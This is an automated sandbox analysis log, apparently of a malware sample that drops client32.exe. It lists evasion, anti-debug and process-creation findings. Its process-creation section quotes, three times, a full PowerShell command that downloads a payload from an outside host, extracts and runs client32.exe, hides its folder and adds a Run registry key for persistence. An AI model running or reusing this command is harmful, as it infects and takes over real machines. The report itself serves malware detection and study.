                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Contains functionality to detect sleep reduction / modifications
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_6F9F91F011_2_6F9F91F0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_6FA04F3011_2_6FA04F30
                                Delayed program exit found
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_110B86C0 Sleep,ExitProcess,11_2_110B86C0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LoadLibraryA,GetProcAddress,OpenServiceA,WideCharToMultiByte,CloseServiceHandle,FreeLibrary,CloseServiceHandle,13_2_1112AF80
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5441Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4379Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeWindow / User API: threadDelayed 938Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeWindow / User API: threadDelayed 419Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeWindow / User API: threadDelayed 7365Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeEvaded block: after key decisiongraph_11-87376
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeEvaded block: after key decisiongraph_11-92741
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeEvaded block: after key decisiongraph_11-92343
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeEvaded block: after key decisiongraph_11-92946
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeEvaded block: after key decisiongraph_11-93078
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeEvaded block: after key decisiongraph_11-93113
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeEvaded block: after key decision
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_11-92482
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_11-86960
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeAPI coverage: 6.5 %
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeAPI coverage: 2.6 %
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_6FA04F3011_2_6FA04F30
                                Source: C:\Windows\System32\wscript.exe TID: 6724Thread sleep time: -30000s >= -30000sJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1336Thread sleep count: 5441 > 30Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1912Thread sleep count: 4379 > 30Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6564Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe TID: 1088Thread sleep time: -234500s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe TID: 572Thread sleep time: -41900s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe TID: 1088Thread sleep time: -1841250s >= -30000sJump to behavior
                                Source: C:\Windows\System32\svchost.exe TID: 2248Thread sleep time: -30000s >= -30000sJump to behavior
                                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_6FA03130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6FA03226h11_2_6FA03130
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,11_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,11_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,11_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,11_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,11_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,11_2_1106ABD0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,13_2_1102D900
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_111273E0 GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,13_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_110BD520 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,13_2_110BD520
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1110F910 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,WriteFile,13_2_1110F910
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1110BD70 wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,13_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_110663B0 _memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,13_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,13_2_1106ABD0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: client32.exeBinary or memory string: VMware
                                Source: client32.exeBinary or memory string: VMWare
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeAPI call chain: ExitProcess graph end nodegraph_11-93243
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeAPI call chain: ExitProcess graph end nodegraph_11-87524
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeAPI call chain: ExitProcess graph end nodegraph_11-86930
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_11162BB7
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_110B7F30 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,_memset,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,11_2_110B7F30
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,11_2_11029BB0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1117D104 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,11_2_1117D104
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,11_2_110934A0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,11_2_11031780
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_11162BB7
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1116EC49
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_6FA128E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_6FA128E1
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_6FA187F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_6FA187F5
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1103179F SetUnhandledExceptionFilter,13_2_1103179F
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,13_2_110934A0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_11162BB7

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 8.39.147.104 443Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_110F4990 GetTickCount,LogonUserA,GetTickCount,GetLastError,11_2_110F4990
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11113190 GetKeyState,DeviceIoControl,keybd_event,11_2_11113190
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe "C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe" Jump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -c $bzeeouwzgc='https://ipva2024-detransp.com/data.php?6891';$udskj=(new-object system.net.webclient).downloadstring($bzeeouwzgc);$onpfcas=[system.convert]::frombase64string($udskj);$asd = get-random -minimum -5 -maximum 12; $unovqzwfvd=[system.environment]::getfolderpath('applicationdata')+'\xoqekrywqk'+$asd;if (!(test-path $unovqzwfvd -pathtype container)) { new-item -path $unovqzwfvd -itemtype directory };$p=join-path $unovqzwfvd 'cxcc.zip';[system.io.file]::writeallbytes($p,$onpfcas);try { add-type -a system.io.compression.filesystem;[system.io.compression.zipfile]::extracttodirectory($p,$unovqzwfvd)} catch { write-host 'failed: ' + $_; exit};$cv=join-path $unovqzwfvd 'client32.exe';if (test-path $cv -pathtype leaf) { start-process -filepath $cv} else {write-host 'no exe.'};$fd=get-item $unovqzwfvd -force; $fd.attributes='hidden';$s=$unovqzwfvd+'\client32.exe';$k='hkcu:\software\microsoft\windows\currentversion\run';$v='cjyjhx';$asdasd='string';new-itemproperty -path $k -name $v -value $s -propertytype $asdasd;
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -c $bzeeouwzgc='https://ipva2024-detransp.com/data.php?6891';$udskj=(new-object system.net.webclient).downloadstring($bzeeouwzgc);$onpfcas=[system.convert]::frombase64string($udskj);$asd = get-random -minimum -5 -maximum 12; $unovqzwfvd=[system.environment]::getfolderpath('applicationdata')+'\xoqekrywqk'+$asd;if (!(test-path $unovqzwfvd -pathtype container)) { new-item -path $unovqzwfvd -itemtype directory };$p=join-path $unovqzwfvd 'cxcc.zip';[system.io.file]::writeallbytes($p,$onpfcas);try { add-type -a system.io.compression.filesystem;[system.io.compression.zipfile]::extracttodirectory($p,$unovqzwfvd)} catch { write-host 'failed: ' + $_; exit};$cv=join-path $unovqzwfvd 'client32.exe';if (test-path $cv -pathtype leaf) { start-process -filepath $cv} else {write-host 'no exe.'};$fd=get-item $unovqzwfvd -force; $fd.attributes='hidden';$s=$unovqzwfvd+'\client32.exe';$k='hkcu:\software\microsoft\windows\currentversion\run';$v='cjyjhx';$asdasd='string';new-itemproperty -path $k -name $v -value $s -propertytype $asdasd;Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1109E5B0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,11_2_1109E5B0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1109ED30 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,11_2_1109ED30
                                Source: client32.exeBinary or memory string: Shell_TrayWnd
                                Source: client32.exeBinary or memory string: Progman
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,11_2_11174898
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,11_2_11174B29
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,11_2_11174BCC
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: GetLocaleInfoA,11_2_1116C24E
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,11_2_11174796
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_111746A1
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,11_2_1117483D
